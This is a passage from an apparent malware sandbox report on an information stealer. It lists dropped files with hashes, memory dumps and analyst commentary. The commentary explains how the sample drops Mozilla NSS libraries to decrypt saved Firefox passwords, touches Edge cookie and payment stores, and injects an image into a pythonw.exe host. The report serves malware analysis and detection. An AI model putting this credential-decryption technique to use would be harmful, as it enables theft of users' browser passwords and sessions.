The last four entries are top-level processes that do not descend from the sample. CompPkgSrv.exe and rundll32.exe are COM local-server activations (the -Embedding switch), the second WerFault.exe is the crash reporter for PID 4716, and VLC opening a video from the desktop is the sandbox's simulated user activity; the signatures attributed to vlc.exe are noise for this sample.
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\ProgramData\mozglue.dll
  Filesize: 133KB
  MD5: 8f73c08a9660691143661bf7332c3c27
  SHA1: 37fa65dd737c50fda710fdbde89e51374d0c204a
  SHA256: 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
  SHA512: 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
- C:\ProgramData\nss3.dll
  Filesize: 1.2MB
  MD5: bfac4e3c5908856ba17d41edcd455a51
  SHA1: 8eec7e888767aa9e4cca8ff246eb2aacb9170428
  SHA256: e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
  SHA512: 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
  The report lists each of these two files twice; the duplicate entries are collapsed here. mozglue.dll and nss3.dll are Mozilla's NSS runtime libraries. Stealers drop copies of them so they can call NSS (PK11SDR_Decrypt and its supporting routines) to decrypt the passwords in a Firefox profile's logins.json with the key material in key4.db, which is what the "Reads user/profile data of web browsers" signature describes; the four "Loads dropped DLL" events by iexplore.exe (PID 4716) are consistent with that use.
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
  Filesize: 20KB
  MD5: 49693267e0adbcd119f9f5e02adf3a80
  SHA1: 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
  SHA256: d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
  SHA512: b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data
  Filesize: 112KB
  MD5: 30e375798049100677ea16b7c578a4ee
  SHA1: bcab7401a5f34ac0e6f795ece8d3ed12944ae99f
  SHA256: ea5c90cfc97f429a2f9e0b1e9b16778b5b19bd8e83a896a30002de70af84e1ce
  SHA512: f8ae930e26ecfe06dc30d4f39858b0eec6b4a81a8139883712505b5c6b58504d463d986ef58c7151a247fe157c6013b570b9d39e1d4a860061e37e0419900582
  Cookies and Web Data are the Edge default profile's SQLite stores for session cookies and for autofill and saved payment data. They were written during the run because the sample launched Edge; the report does not record which process read them.
- C:\Users\Admin\AppData\Roaming\pythonw.exe
  Filesize: 94KB
  MD5: 09e1729b0917b448f60e9520f8b6c844
  SHA1: ac1fe5c308fa4f9c94657a10eae83d55f89d66ac
  SHA256: 333aa54b7532b181164520f69a680eaee344c2f483a02239898a64126d26a6d9
  SHA512: 4e3abc2167c9a138c0128beff1ad2543374c82b157afba6ffa8a2d3ab07a662a5cec0997912343375327b51d5d50f126e1a47dcfdcbd8f356d73f390f7584b67
- \??\pipe\LOCAL\crashpad_3140_OWKOKZMTPSRBCOA
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  These are the digests of zero bytes of input: the sandbox captured Edge's crashpad named pipe for PID 3140 and hashed nothing from it. The entry carries no indicator value.
- Memory dumps for PID 308 (the Roaming\pythonw.exe that PID 4488 wrote to and set thread context on)
  - memory/308-133-0x0000000000000000-mapping.dmp
  - memory/308-134-0x0000000000400000-0x000000000043A000-memory.dmp (232KB)
  - memory/308-136-0x0000000000400000-0x000000000043A000-memory.dmp (232KB)
  - memory/308-137-0x0000000000400000-0x000000000043A000-memory.dmp (232KB)
  - memory/308-138-0x0000000000400000-0x000000000043A000-memory.dmp (232KB)
  - memory/308-139-0x0000000005BF0000-0x0000000006194000-memory.dmp (5.6MB)
  - memory/308-140-0x00000000067C0000-0x0000000006DD8000-memory.dmp (6.1MB)
  - memory/308-141-0x0000000002EA0000-0x0000000002EB2000-memory.dmp (72KB)
  - memory/308-142-0x0000000005750000-0x000000000585A000-memory.dmp (1.0MB)
  - memory/308-143-0x0000000005640000-0x000000000567C000-memory.dmp (240KB)
  - memory/308-146-0x0000000005AB0000-0x0000000005B42000-memory.dmp (584KB)
  - memory/308-147-0x0000000005B50000-0x0000000005BB6000-memory.dmp (408KB)
  - memory/308-152-0x0000000007A40000-0x0000000007A90000-memory.dmp (320KB)
  - memory/308-153-0x0000000007B10000-0x0000000007B86000-memory.dmp (472KB)
  - memory/308-156-0x0000000007F80000-0x0000000008142000-memory.dmp (1.8MB)
  - memory/308-157-0x0000000008680000-0x0000000008BAC000-memory.dmp (5.2MB)
  - memory/308-166-0x0000000007570000-0x000000000758E000-memory.dmp (120KB)
  - memory/308-175-0x0000000000400000-0x000000000043A000-memory.dmp (232KB)
  0x400000 is the default image base of a 32-bit PE, and the 232KB region there was snapshotted five times across the run (indices 134 to 175); it is the first place to look for the image that was written into this process, since the pythonw.exe file on disk is only the host.
- Mapping-only dumps (0x0000000000000000-mapping.dmp) for the remaining processes, as PID-index: 780-159, 1132-161, 1468-174, 1636-150, 1736-149, 1844-163, 2000-179, 2176-176, 2588-155, 3140-144, 3188-177, 3428-188, 3484-186, 3852-145, 4464-185, 4488-132, 4660-165, 4740-183, 4812-181, 4876-195, 5000-187, 5608-194, 5768-190, 6036-192